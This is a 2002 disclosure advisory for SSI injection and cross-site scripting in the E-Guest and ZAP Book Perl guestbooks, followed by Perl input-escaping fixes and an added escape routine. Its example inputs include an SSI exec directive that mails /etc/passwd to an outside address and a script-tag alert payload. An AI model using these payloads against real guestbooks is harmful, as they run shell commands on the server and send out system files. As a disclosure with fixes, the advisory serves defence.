[ DownBload Security Research Lab Advisory ]
[-------------------------------------------------------------------------]

Advisory name:   SSI & CSS execution in E-Guest (1.1) & ZAP Book (v1.0.3)
Advisory number: 6
Application:     E-Guest (1.1) & ZAP Book (v1.0.3) (CGI scripts)

---[ E-Guest
Author:       Leung Eric
E-mail:       cgi@leungeric.com
Homepage:     http://leungeric.com
Working demo: http://leungeric.com/eric/demo/E-Guest_sign.pl

---[ ZAP Book
Author:   Sephiroth32
E-mail:   sephiroth32@unitedff.com
Homepage: http://www.unitedff.com

Date:          28.06.2002
Impact:        remote user can execute shell commands & cross site scripting
Tested on:     Debian 2.1 (2.0.36 kernel), Apache web server - version 1.3.4
Discovered by: DownBload
Mail me @:     downbload@hotmail.com

======[ Overview

--[ E-Guest is a "...full feature guestbook written in Perl...". Maybe a little
    too much 'full feature' ;).

--[ ZAP Book is a guestbook too, but it is more advanced than E-Guest.

======[ Problem

It looks like it is very hard to find a secure guestbook. ;)

--[ The E-Guest author wrote "HTML tag filtering". That is true, but only
    'comment' is filtered; name, email, homepage and location are not, so we
    can put our nasty SSI or CSS code there.

--[ ZAP Book is a different animal. In ZAP Book almost everything is
    filtered. The exception is the 'post' variable, which contains the user
    comment, so again we can put our nasty SSI or CSS code in 'post'.

======[ Examples

---[ E-Guest

SSI attack
~~~~~~~~~~
Full Name: HI<!--#exec cmd="/bin/mail downbload@hotmail.com < /etc/passwd"-->
E-mail:    downbload@hotmail.com
Homepage:
UIN:
Location:  Beyond the light
Comment:   Nothing special, just SSI attack.

CSS attack
~~~~~~~~~~
Full Name: HI<script>javascript:alert('HACKED BY DOWNBLOAD');</script>
E-mail:    downbload@hotmail.com
Homepage:
UIN:
Location:  Beyond the light
Comment:   Nothing special, just CSS attack.

---[ ZAP Book

SSI attack
~~~~~~~~~~
Name:           DownBload
Email:          downbload@hotmail.com
Homepage:
Location:
AIM Screename:
MSN Email:
Yahoo! Screename:
ICQ Number:
Referred by:    Search Engine
Entry:          SSI attack <!--#exec cmd="/bin/mail downbload@hotmail.com < /etc/passwd"-->

CSS attack
~~~~~~~~~~
Name:           DownBload
Email:          downbload@hotmail.com
Homepage:
Location:
AIM Screename:
MSN Email:
Yahoo! Screename:
ICQ Number:
Referred by:    Search Engine
Entry:          CSS attack <script>javascript:alert('HACKED BY DOWNBLOAD');</script>

======[ Solution

As I said in the 'Makebook advisory', the solution for SSI & CSS attacks is
filtering special characters from user input: the '<' and '>' that open an
SSI directive or an HTML tag are replaced with the entities '&lt;' and '&gt;'
before the value is stored or printed.

---[ E-Guest

FIX: Add the following code to E-Guest_sign.pl (or wait for a fixed version :-):

...
$fullname =~ s/</&lt;/g;
$fullname =~ s/>/&gt;/g;
$email    =~ s/</&lt;/g;
$email    =~ s/>/&gt;/g;
$homepage =~ s/</&lt;/g;
$homepage =~ s/>/&gt;/g;
$uin      =~ s/</&lt;/g;
$uin      =~ s/>/&gt;/g;
$location =~ s/</&lt;/g;
$location =~ s/>/&gt;/g;
...

---[ ZAP Book

FIX: Add the following code to addentry.cgi (or wait for a fixed version :-):

...
$in{'post'} =~ s/</&lt;/g;
$in{'post'} =~ s/>/&gt;/g;
...

======[ Greetz

Greetz goes to #hr.hackers <irc.carnet.hr>.

Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, fi, Sunnis, Fr1c,
harlequin, Astral and www.active-security.org.

Special shitz goes to: DarkMan from crohack a.k.a darkforum, and his stupid
friend h4x0r.
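As an added example, not the advisory's own fix nor code from E-Guest or ZAP Book: the same escaping written once as a routine and applied to every submitted field, also covering '&' and quotes so the output is safe in attribute context too. Field names and the sample submission are constructed for the example.

```perl
#!/usr/bin/perl
# Added example (not E-Guest or ZAP Book code): one escape routine applied
# to every user-supplied field instead of per-field substitutions.
use strict;
use warnings;

# Replace the characters that give input meaning in HTML/SSI context.
# '&' must be handled first, otherwise the entities produced below would be
# re-escaped (e.g. "&lt;" -> "&amp;lt;").
sub escape_html {
    my ($s) = @_;
    return '' unless defined $s;
    $s =~ s/&/&amp;/g;
    $s =~ s/</&lt;/g;
    $s =~ s/>/&gt;/g;
    $s =~ s/"/&quot;/g;
    $s =~ s/'/&#39;/g;
    return $s;
}

# Escape every field of a form hash in place (E-Guest's $fullname, $email, ...
# or ZAP Book's %in). Field names here are constructed for this example.
sub escape_fields {
    my ($in) = @_;
    $in->{$_} = escape_html($in->{$_}) for keys %$in;
    return $in;
}

# True if a string still contains anything Apache would treat as an SSI
# directive or a browser as a script tag.
sub looks_active {
    my ($s) = @_;
    return $s =~ /<!--#/ || $s =~ /<script/i;
}

# Constructed sample submission using the payload shapes from the advisory,
# with a harmless command in place of the original one.
my %in = (
    fullname => 'HI<!--#exec cmd="id"-->',
    email    => 'user@example.com',
    location => "<script>alert('x')</script>",
);

escape_fields(\%in);
for my $field (sort keys %in) {
    printf "%-9s %s  active=%s\n", $field, $in{$field},
        looks_active($in{$field}) ? 'yes' : 'no';
}
```

After escaping, every field reports active=no; the stored text still reads as the visitor typed it once the browser renders the entities, but Apache no longer sees a directive and the browser no longer sees a tag.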